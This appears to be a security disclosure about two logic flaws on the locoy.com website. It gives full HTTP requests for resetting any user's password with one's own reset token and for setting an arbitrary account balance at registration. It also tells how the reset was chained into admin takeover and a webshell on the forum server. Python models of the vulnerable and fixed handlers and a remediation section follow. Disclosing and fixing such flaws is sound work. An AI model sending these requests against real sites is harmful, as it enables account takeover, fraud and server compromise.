Getwebshell is available for two bugs on the locomotive collector website.

Source: Internet
Author: User


Vulnerability type: code design issue (business logic).

1: Arbitrary user password reset at http://www.locoy.com/member/getpwd.php

First, register a user. Then choose "retrieve password", enter the correct user name and the email address registered for it, and the system mails a password-retrieval URL to that address.

Like: http://www.locoy.com/member/getpwd.php?action=getpwd&step=4&userid=[user id]&authstr=[32-character authstr]

Now send the step-4 request yourself with the POST parameters modified: keep your own userid and authstr (the token the site mailed to you), but put the target account's user name and registered email address in the name and email fields. The server accepts your token and resets the password of the account you named, so any user's password can be changed.

POST /member/getpwd.php HTTP/1.1
Host: www.locoy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.locoy.com/member/getpwd.php?action=getpwd&step=4&userid=[user id]&authstr=[32-character authstr]
Cookie: DlqmrLfmUGcookietime=31536000; DlqmrLfmUGusername=[hidden content]; PHPSESSID=[hidden content]; [analytics cookies omitted]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 163

name=[account whose password you want to change]&email=[that account's registered email]&password=[new password]&pwdconfirm=[new password again]&authstr=7131195707e5a8da32a54d89047fa17b&userid=[hidden content]&step=4&dosubmit=%CF%C2%D2%BB%B2%BD

(dosubmit is the GBK encoding of "下一步", "Next".)

See the POST request above for the details. Only the name, email, password and pwdconfirm fields need to be changed; the authstr and userid stay as issued to your own account. Sending the modified request is enough for the change to succeed.

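The logic flaw behind the first bug, as an added example and not locoy.com's code: a small Python model of the step-4 handler. The vulnerable version checks authstr against userid but writes the new password to the account chosen by the client-supplied name and email, which is exactly the substitution the request above relies on. The fixed version binds the change to the userid the token was issued for and consumes the token so the request cannot be replayed. The user table, the token format (16 random bytes as 32 hex characters) and the function names are assumptions made for this example.

```python
import hmac
import secrets

# Constructed in-memory user table for this example (not locoy.com's real data).
USERS = {
    "attacker": {"userid": 1001, "email": "attacker@example.com", "password": "old-pass"},
    "admin":    {"userid": 1,    "email": "admin@example.com",    "password": "admin-secret"},
}

# authstr tokens minted by the earlier steps of the retrieve-password flow, keyed by
# the userid they were issued for. The page shows a 32-character authstr; 16 random
# bytes rendered as hex give the same length here (an assumption, not the site's scheme).
RESET_TOKENS = {}


def issue_reset_token(username):
    """Steps 1-3 of the flow: look the user up and build the step-4 URL that the
    site would mail to the registered address. Returns the URL."""
    user = USERS[username]
    token = secrets.token_hex(16)
    RESET_TOKENS[user["userid"]] = token
    return ("http://www.locoy.com/member/getpwd.php?action=getpwd&step=4"
            f"&userid={user['userid']}&authstr={token}")


def _token_ok(userid, authstr):
    """Constant-time comparison of the submitted authstr with the one on file."""
    expected = RESET_TOKENS.get(userid)
    if expected is None or not isinstance(authstr, str):
        return False
    return hmac.compare_digest(expected.encode(), authstr.encode())


def _by_userid(userid):
    return next((u for u in USERS.values() if u["userid"] == userid), None)


def reset_password_vulnerable(post):
    """Models the flaw reported above: authstr is validated against `userid`, but the
    account that receives the new password is chosen by the client-supplied `name`
    and `email` fields, which are never tied back to that userid."""
    if post["password"] != post["pwdconfirm"]:
        return "password mismatch"
    if not _token_ok(int(post["userid"]), post["authstr"]):
        return "bad authstr"
    target = USERS.get(post["name"])
    if target is None or target["email"] != post["email"]:
        return "no such user"
    target["password"] = post["password"]      # any account, e.g. an administrator
    return "ok"


def reset_password_fixed(post):
    """Hardened handler: the only account that can change is the one the token was
    issued for; `name`/`email` play no part in choosing it, and the token is single-use."""
    if post["password"] != post["pwdconfirm"]:
        return "password mismatch"
    userid = int(post["userid"])
    if not _token_ok(userid, post["authstr"]):
        return "bad authstr"
    target = _by_userid(userid)
    if target is None:
        return "no such user"
    target["password"] = post["password"]
    del RESET_TOKENS[userid]                   # a replayed request now fails
    return "ok"


if __name__ == "__main__":
    url = issue_reset_token("attacker")
    authstr = url.rsplit("authstr=", 1)[1]
    # The attacker's own token and userid, but the administrator's name and email.
    post = {"name": "admin", "email": "admin@example.com",
            "password": "pwned", "pwdconfirm": "pwned",
            "authstr": authstr, "userid": "1001", "step": "4"}
    print("vulnerable:", reset_password_vulnerable(post), USERS["admin"]["password"])
    print("fixed:     ", reset_password_fixed(post), USERS["admin"]["password"],
          USERS["attacker"]["password"])
```

The check that matters is the one the vulnerable handler never makes: the account being written must be derived from the same userid the token was validated against. Consuming the token on success also closes the replay window the write-up exploits by resending the captured request.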
2: A newly registered user can set their own account balance at registration.

When sending the registration request, add one extra parameter, memberinfo[amount]=10. The new account then has a balance of 10 yuan as soon as registration completes, which is enough to buy the latest version of the Locomotive Collector software in the site's store.

POST /member/register.php HTTP/1.1
Host: www.locoy.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://www.locoy.com/member/register.php
Cookie: DlqmrLfmUGcookietime=31536000; DlqmrLfmUGusername=[hidden content]; PHPSESSID=[hidden content]; [analytics cookies omitted]
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 246

memberinfo%5Busername%5D=[hidden content]&memberinfo%5Bpassword%5D=123123&pwdconfirm=123123&memberinfo%5Bemail%5D=[hidden content]&checkcodestr=undefined&memberinfo%5Bmodelid%5D=[member model id]&memberinfo%5Bamount%5D=10&regAgreement=1&action=register&dosubmit=++%D7%A2++%B2%E1++&vundefined=undefined

(memberinfo%5Bamount%5D, i.e. memberinfo[amount], is the added parameter; any amount can be entered. dosubmit is the GBK encoding of "注册", "Register".)

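The second bug is mass assignment: the registration handler copies every memberinfo[...] column from the request into the new member row, so a column the form never exposes (amount) can be set by the client. The following is an added Python example, not locoy.com's code, showing how a PHP-style body with bracketed keys parses, a vulnerable handler that copies all supplied columns, and a fixed handler that allow-lists the columns a visitor may set. The request bodies, the allow-list and the default row values are constructed for this example; the real column list is not on the page.

```python
from urllib.parse import parse_qsl

# Constructed request bodies for this example. The field names are the ones in the
# register.php POST above (memberinfo[username], memberinfo[password], memberinfo[email],
# memberinfo[modelid]); the values are made up.
NORMAL_BODY = ("memberinfo%5Busername%5D=alice&memberinfo%5Bpassword%5D=123123"
               "&pwdconfirm=123123&memberinfo%5Bemail%5D=alice%40example.com"
               "&memberinfo%5Bmodelid%5D=10&regAgreement=1&action=register")
# Same registration with the extra parameter the write-up adds.
TAMPERED_BODY = NORMAL_BODY + "&memberinfo%5Bamount%5D=10"

# Columns the registration form is meant to let a visitor fill in (an assumption for
# the example).
ALLOWED_MEMBERINFO = {"username", "password", "email", "modelid"}
# Server-side defaults for everything the visitor must not control.
NEW_MEMBER_DEFAULTS = {"amount": 0}


def parse_php_form(body):
    """Decode an application/x-www-form-urlencoded body the way PHP builds $_POST:
    a key written as memberinfo[amount] becomes {"memberinfo": {"amount": "10"}}."""
    form = {}
    for key, value in parse_qsl(body, keep_blank_values=True):
        if "[" in key and key.endswith("]"):
            base, sub = key[:-1].split("[", 1)
            form.setdefault(base, {})[sub] = value
        else:
            form[key] = value
    return form


def register_vulnerable(body):
    """Mass assignment: every memberinfo[...] column the client sends is copied into
    the new row, so memberinfo[amount]=10 becomes a 10 yuan balance. (Password
    hashing is omitted; it is not the point of the example.)"""
    form = parse_php_form(body)
    if form["memberinfo"].get("password") != form.get("pwdconfirm"):
        raise ValueError("password confirmation does not match")
    member = dict(NEW_MEMBER_DEFAULTS)
    member.update(form["memberinfo"])          # attacker-chosen columns land here
    return member


def register_fixed(body):
    """Allow-list the columns a visitor may set; anything else is rejected rather
    than silently dropped, so a tampered request shows up in the logs."""
    form = parse_php_form(body)
    supplied = form.get("memberinfo", {})
    if supplied.get("password") != form.get("pwdconfirm"):
        raise ValueError("password confirmation does not match")
    unexpected = set(supplied) - ALLOWED_MEMBERINFO
    if unexpected:
        raise ValueError(f"unexpected memberinfo fields: {sorted(unexpected)}")
    member = dict(NEW_MEMBER_DEFAULTS)
    member.update({k: supplied[k] for k in ALLOWED_MEMBERINFO if k in supplied})
    return member


if __name__ == "__main__":
    print("vulnerable balance:", register_vulnerable(TAMPERED_BODY)["amount"])
    try:
        register_fixed(TAMPERED_BODY)
    except ValueError as err:
        print("fixed:", err)
```

Rejecting rather than dropping unknown columns is a deliberate choice: a silently ignored memberinfo[amount] leaves no trace, whereas a rejected registration with the field name in the error is a usable detection signal.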
Using the first bug (arbitrary password reset), several administrator accounts can be found on bbs.locoy.com and their passwords reset, after which you can log in to the Discuz 3.2 admin backend.

From there a webshell follows. The main site and the BBS are on the same server, so there is nothing more to add.

Solution:

Enhanced filtering and validation on the server side. For the password reset, the step-4 handler should change only the password of the account the authstr was issued for (the userid the token is bound to), ignore the client-supplied name and email when choosing the target, and invalidate the token after one use. For registration, the handler should accept only an explicit list of memberinfo fields (username, password, email, modelid) and reject anything else, such as amount.
